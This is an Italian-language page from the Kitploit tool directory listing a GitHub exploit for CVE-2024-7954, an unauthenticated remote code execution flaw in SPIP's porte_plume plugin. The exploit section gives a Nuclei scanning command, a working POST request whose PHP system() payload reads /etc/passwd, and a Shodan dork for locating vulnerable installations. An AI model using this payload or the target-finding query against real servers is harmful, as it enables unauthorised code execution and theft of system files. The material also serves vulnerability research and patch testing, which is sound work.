Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RCE-CVE-2024-7954 — Exploit per CVE-2024-7954: esecuzione remota di codice nel plugin porte_plume di SPIP. Include un template per la scansione con Nuclei e un dork di Shodan per identificare istanze vulnerabili. | Kitploit
Strumenti/GitHubGitHub/arthikw3b/rce-cve-2024-7954
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

Exploit per CVE-2024-7954: esecuzione remota di codice nel plugin porte_plume di SPIP. Include un template per la scansione con Nuclei e un dork di Shodan per identificare istanze vulnerabili.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RCE-CVE-2024-7954

Descrizione

Il plugin porte_plume, utilizzato dalle versioni di SPIP precedenti a 4.30-alpha2, 4.2.13 e 4.1.16, è soggetto a una vulnerabilità critica di esecuzione di codice arbitrario (RCE). Questo difetto consente a un attaccante remoto non autenticato di eseguire codice PHP arbitrario come utente SPIP creando una richiesta HTTP specifica. Il potenziale di sfruttamento è grave, poiché consente agli attaccanti di eseguire comandi malevoli sul server, che potrebbero portare ad accessi non autorizzati, violazioni dei dati o ulteriore compromissione del sistema.

Dettagli della vulnerabilità

  • Software interessato: SPIP (versioni precedenti a 4.30-alpha2, 4.2.13 e 4.1.16)
  • Tipo di vulnerabilità: Esecuzione di codice remoto (RCE)
  • Livello di gravità: Critico
  • Sfruttabilità: Attaccanti remoti e non autenticati possono sfruttare questa vulnerabilità.

Exploit

##Nuclei Scan

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml

Un esempio di richiesta HTTP costruita che può essere utilizzata per sfruttare questa vulnerabilità è il seguente:

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Spiegazione dell'exploit:

  • La richiesta POST è diretta all'azione porte_plume_previsu del file index.php di SPIP.
  • Il parametro data contiene un payload che sfrutta la funzione system() di PHP per eseguire un comando (in questo caso, cat /etc/passwd), che legge il contenuto del file delle password.
  • Modificando il comando all'interno della funzione system(), un attaccante potrebbe eseguire qualsiasi codice PHP sul server, portando a conseguenze gravi.

Shodan Dork

Per identificare installazioni SPIP potenzialmente vulnerabili, è possibile utilizzare la seguente query di ricerca Shodan:

root@kitploit:~
app="SPIP"

Questa vulnerabilità sottolinea l'importanza di mantenere il software aggiornato e di implementare misure di sicurezza robuste per proteggersi dallo sfruttamento.

Scarica lo strumento